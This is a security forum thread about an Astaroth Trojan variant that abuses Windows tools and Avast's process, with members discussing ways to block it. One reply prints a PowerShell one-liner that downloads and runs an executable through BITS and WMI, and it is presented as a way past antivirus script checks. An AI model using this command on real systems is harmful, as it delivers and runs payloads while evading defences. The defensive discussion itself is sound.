This Trojan exploits antivirus software to steal your data

Solarquest

Moderator
Thread author
Verified
Staff Member
Malware Hunter
Well-known
Jul 22, 2014
2,525
Astaroth disguises itself as image and GIF files to infect PCs.

A new strain of the Astaroth Trojan has been given the capability to exploit vulnerable processes in antivirus software and services.
Cybereason's Nocturnus Research team said in a blog post published on Wednesday that the variant is able to utilize modules in cybersecurity software in order to steal online credentials and personal data.
In its latest form, Astaroth is being used in spam campaigns across Brazil and Europe, with thousands of infections recorded at the end of 2018. The malware spreads through .7zip file attachments and malicious links.
The cybersecurity researchers said the Trojan masquerades as a JPEG, .GIF, or an extensionless file to avoid detection when executed on a machine.
If a spam email or phishing messages prove successful and the file is downloaded and opened, the legitimate Microsoft Windows BITSAdmin tool is used to download the full payload from a command-and-control (C2) server.

After initializing, the malware launches an XSL script which establishes a channel with the C2 server. The script, which is obfuscated, contains functions to hide itself from antivirus software and is responsible for the process which leverages BITSAdmin to download payloads, including Astaroth, from a separate C2 server.
Past variants of the Trojan would then launch a scan to find antivirus programs, and should Avast, in particular, be present on an infected system, the malware would simply quit. However, Astaroth will now abuse the antivirus program to "inject a malicious module into one of its processes," according to the researchers.

If Avast is detected, the Avast Software Runtime Dynamic Link Library which runs modules for Avast, aswrundll.exe, is abused. The executable -- which is similar to Microsoft's rundll32.exe -- can execute DLLs by calling their exported functions.

....
...
 

Wraith

Level 13
Verified
Top Poster
Well-known
Aug 15, 2018
634
Another perfect example of how malware is evolving and becoming sophisticated and why users should be taught about safe surfing habits and be given security knowledge. :confused:
Another reason to create a HIPS and Firewall rule in my ESET IS to monitor the execution of bitsadmin. :p
 

Andy Ful

From Hard_Configurator Tools
Verified
Honorary Member
Top Poster
Developer
Well-known
Dec 23, 2014
8,040
Another perfect example of how malware is evolving and becoming sophisticated and why users should be taught about safe surfing habits and be given security knowledge. :confused:
Another reason to create a HIPS and Firewall rule in my ESET IS to monitor the execution of bitsadmin. :p
You can simply block it.(y)
But it would be even better to block shortcuts (.lnk) in the Download folder or wmic.exe (Windows tool), because the infection chain starts from the shortcut, that runs wmic.exe to download the scriptlet which can execute bitsadmin.exe and some other Windows tools. Those tools can download and inject the final payload.
 
Last edited:

notabot

Level 15
Verified
Oct 31, 2018
703
How does the execution even start though ? Does it work only for email clients that have active content enabled and there’s no behavioral blocking rule for child processes? I’d assume so, unless they also use an exploit to bypass native security mechanisms
 

notabot

Level 15
Verified
Oct 31, 2018
703
I know. Syshardener simply helps makes those rules easier for those not tech savy enough.

What I'm asking is whether that would be enough to mitigate the threat?

I wonder if there is a threat in the first place when active content is disabled for the email client or/and ASR rule for outlook is switched on / child processes are blocked via Exploit Guard ;) unless they also apply exploits to bypass the above I’d imagine the answer is no
 

Andy Ful

From Hard_Configurator Tools
Verified
Honorary Member
Top Poster
Developer
Well-known
Dec 23, 2014
8,040
How does the execution even start though ? Does it work only for email clients that have active content enabled and there’s no behavioral blocking rule for child processes? I’d assume so, unless they also use an exploit to bypass native security mechanisms
Child processes of what? :unsure:
This malware does not run any installed application, but directly execute wmic.exe when the user clicked on the shortcut.
 

Andy Ful

From Hard_Configurator Tools
Verified
Honorary Member
Top Poster
Developer
Well-known
Dec 23, 2014
8,040
I wonder if there is a threat in the first place when active content is disabled for the email client or/and ASR rule for outlook is switched on / child processes are blocked via Exploit Guard ;) unless they also apply exploits to bypass the above I’d imagine the answer is no
Now you know the truth. :giggle:
Sadly, the user will bypass all of them by simply clicking the shortcut.:(
By the way, that is also a bypass for most of SRP setups, except when someone knows how to block safely the shortcuts.
 

upnorth

Moderator
Verified
Staff Member
Malware Hunter
Well-known
Jul 27, 2015
5,457
As with many traditional campaigns, this campaign begins with a .7zip file that gets downloaded to the user machine through a mail attachment or a mistakenly-pressed hyperlink. The downloaded .7zip file contains a .lnk file that, once pressed, initializes the malware. Upon initialization, a process spawns that uses the legitimate wmic.exe to initialize an XSL Script Processing attack. This attack allowed the malware to communicate with a remote C2 server and sent information like location information about the infected machine to the remote server. The remote XSL script contains highly obfuscated code that is able to execute additional malicious activity. It uses several functions to hide its activities from antivirus defenses and researchers. This script is ultimately responsible for the malicious use of BITSAdmin to download the attackers payload to the target from a separate C2 server. The payload files are masqueraded as JPEGs, GIFs, and extensionless files, and contain the Astaroth Trojan modules.
KGncTYSX4fHVDj12-3LiS3KJ0HDenbf-FPnESKjYrBfJRHxaQD1vRGnvQa2XHrlddr4EMlvISyvyK8-TjculztoHZhBkxMI8XLrTDc8_qgIJML9KRwn0YitqAIU8_LUqZmTW2P7d

Full analysis here.
 

notabot

Level 15
Verified
Oct 31, 2018
703
Now you know the truth. :giggle:
Sadly, the user will bypass all of them by simply clicking the shortcut.:(
By the way, that is also a bypass for most of SRP setups, except when someone knows how to block safely the shortcuts.

Protecting people from themselves is always hard :)

Though to be fair, anyone could fall for something like this if it’s part of a well crafted spear phishing email
 

Andy Ful

From Hard_Configurator Tools
Verified
Honorary Member
Top Poster
Developer
Well-known
Dec 23, 2014
8,040
I know. Syshardener simply helps makes those rules easier for those not tech savy enough.

What I'm asking is whether that would be enough to mitigate the threat?
NVT SysHardener, NVT OSA, and H_C will block this malware.
The malware can be improved by using PowerShell to bypass the firewall rules, and then it could bypass SysHardener.
Windows Defender ASR can stop this malware (blocked execution of wmic.exe).
 

notabot

Level 15
Verified
Oct 31, 2018
703
NVT SysHardener, NVT OSA, and H_C will block this malware.
The malware can be improved by using PowerShell to bypass the firewall rules, and then it could bypass SysHardener.
Windows Defender ASR can stop this malware (blocked execution of wmic.exe).

I wonder if ASR is actually sufficient and there’s no need to block the lolbins (assuming no ASR bypass exploit). It would massively simplify policies & their maintenance, as there’s plenty of lolbins and blocking all of them could also impact the system
 

Andy Ful

From Hard_Configurator Tools
Verified
Honorary Member
Top Poster
Developer
Well-known
Dec 23, 2014
8,040
I wonder if ASR is actually sufficient and there’s no need to block the lolbins (assuming no ASR bypass exploit). It would massively simplify policies & their maintenance, as there’s plenty of lolbins and blocking all of them could also impact the system
It is sufficient for this malware and some more. But WD ASR can be possibly bypassed on Windows Home and Pro by PowerShell, for example:
Code:
powershell Import-Module bitstransfer;Start-BitsTransfer 'https://kcsoftwares.com/files/sumo_lite.exe' $home\Downloads\sumo_lite.exe;$filepath = $HOME + '\Downloads\sumo_lite.exe'; Invoke-WmiMethod -class win32_Process -Name Create -ArgumentList $filepath
Create the shortcut with this command and click the shortcut. It should download and execute the known & legal & useful SUMo installer. This should also bypass most AVs (anti-script modules).
The SUMo webpage:
 

bribon77

Level 35
Verified
Top Poster
Well-known
Jul 6, 2017
2,392

About us

  • MalwareTips is a community-driven platform providing the latest information and resources on malware and cyber threats. Our team of experienced professionals and passionate volunteers work to keep the internet safe and secure. We provide accurate, up-to-date information and strive to build a strong and supportive community dedicated to cybersecurity.

User Menu

Follow us

Follow us on Facebook or Twitter to know first about the latest cybersecurity incidents and malware threats.

Top